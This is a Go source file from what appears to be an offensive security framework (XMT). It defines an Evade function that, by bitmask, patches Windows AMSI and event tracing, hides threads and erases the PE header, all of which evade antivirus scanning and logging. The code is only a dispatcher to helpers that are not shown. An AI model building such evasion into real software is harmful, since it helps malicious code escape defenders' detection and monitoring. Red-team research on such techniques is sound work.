github.com/iDigitalFlame/xmt@v0.5.4/device/evade_windows.go (about)

     1  //go:build windows
     2  // +build windows
     3  
     4  // Copyright (C) 2020 - 2023 iDigitalFlame
     5  //
     6  // This program is free software: you can redistribute it and/or modify
     7  // it under the terms of the GNU General Public License as published by
     8  // the Free Software Foundation, either version 3 of the License, or
     9  // any later version.
    10  //
    11  // This program is distributed in the hope that it will be useful,
    12  // but WITHOUT ANY WARRANTY; without even the implied warranty of
    13  // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    14  // GNU General Public License for more details.
    15  //
    16  // You should have received a copy of the GNU General Public License
    17  // along with this program.  If not, see <https://www.gnu.org/licenses/>.
    18  //
    19  
    20  package device
    21  
    22  import "github.com/iDigitalFlame/xmt/device/winapi"
    23  
    // Evade applies the evasion techniques selected by the bitmask f.
    //
    // The flag values are the platform specific 'Evade*' constants. Each bit that
    // is set triggers the matching winapi call, always in this fixed order:
    // EvadeWinPatchAmsi, EvadeWinPatchTrace, EvadeWinHideThreads, EvadeEraseHeader.
    //
    // The first error returned by any step is returned immediately and the
    // remaining steps are skipped. Steps that already completed are not undone
    // here, so a non-nil error can mean the flags were only partially applied.
    // Bits in f that this function does not test are ignored.
    func Evade(f uint8) error {
    	// The array order is the execution order; keep it in sync with the doc
    	// comment above.
    	steps := [...]struct {
    		mask uint8
    		run  func() error
    	}{
    		{EvadeWinPatchAmsi, winapi.PatchAmsi},
    		{EvadeWinPatchTrace, winapi.PatchTracing},
    		{EvadeWinHideThreads, winapi.HideGoThreads},
    		{EvadeEraseHeader, winapi.ErasePEHeader},
    	}
    	for i := range steps {
    		// Skip any step whose bit is not set in the caller's mask.
    		if f&steps[i].mask == 0 {
    			continue
    		}
    		if err := steps[i].run(); err != nil {
    			// Fail fast: later steps are not attempted after an error.
    			return err
    		}
    	}
    	return nil
    }